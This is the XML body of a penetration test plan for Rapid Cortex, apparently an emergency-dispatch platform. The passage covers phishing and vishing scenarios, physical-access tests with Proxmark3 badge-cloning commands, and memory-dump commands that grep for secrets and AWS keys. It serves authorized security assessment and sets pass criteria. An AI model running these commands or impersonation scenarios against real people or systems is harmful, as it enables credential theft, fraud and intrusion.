          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Send crafted emails impersonating a trusted source to capture credentials or deploy a payload.</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Scenario A: Email from 'AWS Security' claiming unusual login activity, linking to a fake AWS console login</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Scenario B: Email from 'RC IT Support' requesting the recipient verify their Cognito credentials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Scenario C: Email from a fake agency customer requesting an urgent account reset</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Scenario D: Spear phish using LinkedIn data about a specific RC engineer</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GoPhish — open-source phishing simulation platform</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">gophish</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Configure campaigns, landing pages, and tracking pixels</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Metrics: open rate, click rate, credential submission rate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Vishing (Voice Phishing)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Phone calls impersonating IT support, a vendor, or a law enforcement contact requesting account changes.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Scenario: Call RC billing contact claiming to be from 'AWS billing support', request payment method update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Scenario: Call agency IT admin impersonating RC onboarding team, request they provision a new user account</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Scenario: Call RC ops team impersonating a 911 center director, request emergency password reset without MFA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Pretexting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Build a fabricated scenario to establish trust before extracting information.</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Scenario: 'New RC employee' asks an existing engineer for help accessing a system they claim they should have access to</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Scenario: 'Ring certification reviewer' calls to verify account credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Business Email Compromise</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Impersonate an executive to authorize payment changes or access grants.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Scenario: Email appearing to be from the CEO requesting an urgent wire transfer or pricing change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Scenario: Email appearing to be from the CTO requesting emergency production access for a contractor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Rapid Cortex Specific Social Engineering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1800"/>
        <w:gridCol w:w="5040"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Attack Scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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Impact if Successful</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Fake AWS security alert → credential capture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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engineers</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Full AWS account compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Impersonate RC sales rep → agency installs malware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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Agency IT admin</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Agency network compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Fake billing support call → payment redirect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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billing contact</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Financial fraud</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Emergency MFA bypass request</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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ops team</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Unauthorized account access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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'New employee' request for production creds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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senior engineers</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Production system access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Defensive Procedures to Verify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Does RC have a callback verification procedure before resetting MFA for any user?</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Does the billing team have a voice verification process before changing payment instructions?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Is there a documented procedure for handling emergency access requests outside business hours?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Do all employees know to report suspicious calls to security@rapidcortex.us?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Is there a code word or out-of-band verification process for executive wire transfer requests?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Pass Criteria</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Less than 10% of employees click phishing links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Zero credential submissions on phishing landing pages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All vishing attempts escalated to security team before any action taken</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MFA reset requires identity verification through a second channel</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unauthorized user accounts created as a result of social engineering</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Phase 5 — Physical Access Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Physical access testing examines whether an attacker could gain physical access to hardware, workstations, or networks used by Rapid Cortex. For a cloud-native platform, the physical attack surface centers on developer workstations and any shared office environments, rather than server hardware.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:color="7C3AED" w:sz="8"/>
        </w:pBdr>
        <w:shd w:fill="F5F3FF" w:val="clear"/>
        <w:spacing w:after="120" w:before="120"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">AWS manages physical security of its data centers under SOC 2 Type II, ISO 27001, and FedRAMP certifications. Physical testing for Rapid Cortex does not include AWS data centers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">In-Scope Physical Targets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Rapid Cortex developer workstations with production AWS access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Office environments where Cognito admin credentials are used</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Any shared workspace or co-working space used by RC engineers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Agency customer premises where dispatchers use the platform (with agency consent)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Test Techniques</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Tailgating</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Follow an authorized employee through a secured entrance without using your own access credentials.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Test: Does any RC employee challenge an unknown person who enters behind them?</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Test: Are there mantraps or single-person turnstiles at office entry points?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Badge Cloning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Use an RFID reader to capture proximity card credentials from RC employees.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Proxmark3 — RFID analysis and cloning tool</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">pm3 --&gt; hf search          # scan for nearby HF RFID cards</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">pm3 --&gt; hf mf chk          # check for default Mifare Classic keys</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">pm3 --&gt; hf mf dump         # dump card contents if keys found</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">pm3 --&gt; hf mf sim          # simulate cloned card</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Workstation Security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Is every workstation locked when the engineer steps away (idle timeout ≤ 5 minutes)?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Can a physical attacker access a logged-in browser with AWS console active?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Are credentials stored in unencrypted files on the desktop or downloads folder?</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Is Full Disk Encryption (FileVault / BitLocker) enforced on all devices?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Can USB devices be connected to workstations?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Network Access Points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Are ethernet ports in common areas active without network access control?</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Is the office WiFi password posted publicly?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Can a connected device on the guest network reach any internal RC resources?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Dumpster Diving</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Are printed documents with configuration details, credentials, or agency data shredded?</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Are decommissioned devices wiped before disposal?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Rapid Cortex Specific Physical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0"/>
        <w:gridCol w:w="2520"/>
        <w:gridCol w:w="5040"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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Mitigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Unlocked workstation with AWS console</w:t>
            </w:r>
          </w:p>
        </w:tc>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Full production access</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Screensaver lock ≤5min, MFA on AWS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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USB drive with database export</w:t>
            </w:r>
          </w:p>
        </w:tc>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Bulk customer data exfiltration</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Disable USB mass storage, DLP policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Printed agency configuration with FIPS codes</w:t>
            </w:r>
          </w:p>
        </w:tc>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Target mapping for attacks</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Shred all printed configs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Unattended dispatcher terminal at agency</w:t>
            </w:r>
          </w:p>
        </w:tc>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Incident data access</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Screen timeout + PIN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Office WiFi network pivoting</w:t>
            </w:r>
          </w:p>
        </w:tc>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Internal tool access</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Separate guest/corp networks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Pass Criteria</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All workstations auto-lock after 5 minutes of inactivity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Full disk encryption confirmed on all engineer laptops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unencrypted credentials found in accessible files or printed materials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USB mass storage devices blocked on all RC-managed workstations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Tailgating challenge rate above 90% in simulated test</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Phase 6 — Runtime Memory Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Runtime memory analysis examines the contents of running processes to extract secrets, credentials, session tokens, or cryptographic keys that are not visible in static code or stored on disk.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Primary Targets for Rapid Cortex</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Developer workstations running aws-vault or SSO sessions with cached credentials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CI/CD runners (GitHub Actions, CodeBuild) that hold temporary AWS credentials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Lambda execution environments — any secrets retrieved from Secrets Manager</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Node.js processes on developer machines running the API locally</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools and Techniques</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Linux Process Memory Dump</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Identify target process</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">pgrep -a node</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Dump process memory using gcore</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">gcore -o /tmp/node-dump.core $(pgrep node)</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Extract strings from dump</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">strings /tmp/node-dump.core | grep -iE 'secret|token|password|key|arn|cognito|ring|bearer'</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Search for AWS credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">strings /tmp/node-dump.core | grep -E 'AKIA|ASIA|aws_access|aws_secret'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. macOS Memory Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
